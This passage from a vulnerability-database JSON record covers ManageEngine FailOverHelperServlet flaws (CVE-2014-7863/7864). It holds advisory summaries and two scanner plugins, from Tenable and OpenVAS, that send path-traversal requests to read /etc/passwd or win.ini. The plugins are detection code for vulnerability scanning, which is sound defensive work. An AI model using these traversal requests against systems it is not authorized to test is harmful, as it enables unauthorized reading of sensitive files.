Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84017);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7863\");\n script_bugtraq_id(74402);\n\n script_name(english:\"ManageEngine Applications Manager FailOverHelperServlet 'fileName' Parameter Arbitrary File Disclosure\");\n script_summary(english:\"Attempts to read a local file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine Applications Manager running on remote\nweb server is affected by a file disclosure vulnerability due to a\nfailure to properly sanitize user-supplied input to the 'fileName'\nparameter of the FailOverHelperServlet script. A remote,\nunauthenticated attacker, using a crafted request, can exploit this to\nview arbitrary files.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Jan/114\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.manageengine.com/products/applications_manager/issues.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Applications Manager version 11 Build 11912.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:manageengine:applications_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_applications_manager_detect.nasl\");\n script_require_keys(\"installed_sw/ManageEngine Applications Manager\");\n script_require_ports(\"Services/www\", 9090);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine Applications Manager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:9090);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# Establish a session first\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir,\n exit_on_fail : TRUE\n);\n\ndir = dir - \"/index.do\";\nurl = \"/servlet/FailOverHelperServlet?operation=copyfile&fileName=\";\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n files = make_list('/windows/win.ini','/winnt/win.ini');\n else\n files = make_list('/etc/passwd');\n}\nelse files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['/winnt/win.ini'] = \"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\";\nfile_pats['/windows/win.ini'] = \"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\";\n\nvuln = FALSE;\n\nforeach file (files)\n{\n res = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + url + file,\n data : '',\n exit_on_fail : TRUE\n );\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n vuln = TRUE;\n break;\n }\n}\nif (!vuln)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : file,\n request : make_list(http_last_sent_request()),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n);\nexit(0);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:46:37", "description": "An information disclosure vulnerability exists in ManageEngine OpManager, Applications Manager and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the a parameter sent to FailOverHelperServlet in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending malicious HTTP requests to the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-03-02T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FailOverHelperServlet copyfile Information Disclosure (CVE-2014-7863)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2015-10-22T00:00:00", "id": "CPAI-2015-0206", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2022-01-31T21:14:20", "description": "This vulnerability allows remote attackers to disclose files on vulnerable installations of ManageEngine Applications Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the FailOverHelperServlet servlet. The issue lies in the failure to properly sanitize a filename. A remote attacker can exploit this vulnerability to disclose files from the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-04-29T00:00:00", "type": "zdi", "title": "ManageEngine Applications Manager FailOverHelperServlet Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2015-04-29T00:00:00", "id": "ZDI-15-162", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-162/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:51:21", "description": "The FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine Applications Manager before 11.9 build 11912, OpManager 8 through 11.5 build 11400, and IT360 10.5 and earlier does not properly restrict access, which allows remote attackers and remote authenticated users to (1) read arbitrary files via the fileName parameter in a copyfile operation or (2) obtain sensitive information via a directory listing in a listdirectory operation to servlet/FailOverHelperServlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-08T17:15:00", "type": "cve", "title": "CVE-2014-7863", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-02-13T16:30:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.5", "cpe:/a:zohocorp:manageengine_it360:10.5", "cpe:/a:zohocorp:manageengine_applications_manager:11.9"], "id": "CVE-2014-7863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7863", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_applications_manager:11.9:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:23", "description": "Multiple SQL injection vulnerabilities in the FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine OpManager 8 through 11.5 build 11400 and IT360 10.5 and earlier allow remote attackers and remote authenticated users to execute arbitrary SQL commands via the (1) customerName or (2) serverRole parameter in a standbyUpdateInCentral operation to servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.", "cvss3": {}, "published": "2015-02-04T16:59:00", "type": "cve", "title": "CVE-2014-7864", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7864"], "modified": "2018-10-09T19:53:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.5", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0"], "id": "CVE-2014-7864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7864", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-16T16:51:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7864"], "description": "This host is installed with ZOHO ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "modified": "2020-04-09T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310805473", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805473", "type": "openvas", "title": "ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805473\");\n script_version(\"2020-04-09T12:09:29+0000\");\n script_cve_id(\"CVE-2014-7864\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-09 12:09:29 +0000 (Thu, 09 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-20 11:53:55 +0530 (Fri, 20 Mar 2015)\");\n script_name(\"ZOHO ManageEngine OpManager Multiple Vulnerabilities - Feb15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ZOHO ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to read a local file via a crafted HTTP POST request\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to multiple SQL injection, Local file include and File overwrite\n vulnerabilities in the FailOverHelperServlet (aka FailServlet) servlet in ZOHO ManageEngine OpManager.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n remote attackers and remote authenticated users to execute arbitrary SQL\n commands via the (1) customerName or (2) serverRole parameter in a\n standbyUpdateInCentral operation or to read/overwrite arbitrary files to\n servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\");\n\n script_tag(name:\"affected\", value:\"ZOHO ManageEngine OpManager\n versions 8 through 11.5 build 11400\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 11.6 or install the\n patch for v11.4 and 11.5 bilities-in-failoverhelperservlet\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130162\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/534575/100/0/threaded\");\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservle\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"manageengine/opmanager/http/detected\");\n script_require_ports(\"Services/www\", 8080);\n script_xref(name:\"URL\", value:\"https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnera\");\n script_xref(name:\"URL\", value:\"http://www.manageengine.com\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit(0);\n\nurl = '/';\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( \"Set-Cookie\" >!< buf )\n{\n url = '/LoginPage.do';\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( \"Set-Cookie\" >!< buf ) exit( 0 );\n}\n\nco = eregmatch( pattern:'Set-Cookie: ([^\\r\\n]+)', string:buf );\nif( isnull( co[1] ) ) exit( 0 );\n\ncookie = co[1];\n\nservlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet';\nurl = '/servlet/' + servlet;\n\nreq = http_get_req( port:port, url:url, add_headers:make_array( \"Cookie\", cookie ) );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( \"HTTP/1\\.. 404\" >< buf ) servlet = 'FailOverHelperServlet';\n\nfiles = traversal_files();\n\nforeach file ( keys( files ) )\n{\n if( files[file] == 'etc/passwd' )\n traversal = '/../../../../../../../../../../../../../';\n else\n traversal = '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\\\\';\n\n url = '/servlet/' + servlet + '?operation=copyfile&fileName=' + traversal + files[file];\n\n req = http_post_put_req( port:port, url:url, data:NULL, add_headers: make_array( \"Cookie\", cookie ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:file, string:res ) )\n {\n report = 'By sending the request\\n\\n' + req + 'it was possible to read the file ' + files[file] + ' on the remote Host.\\n\\nResponse:\\n\\n' + res + '\\n';\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}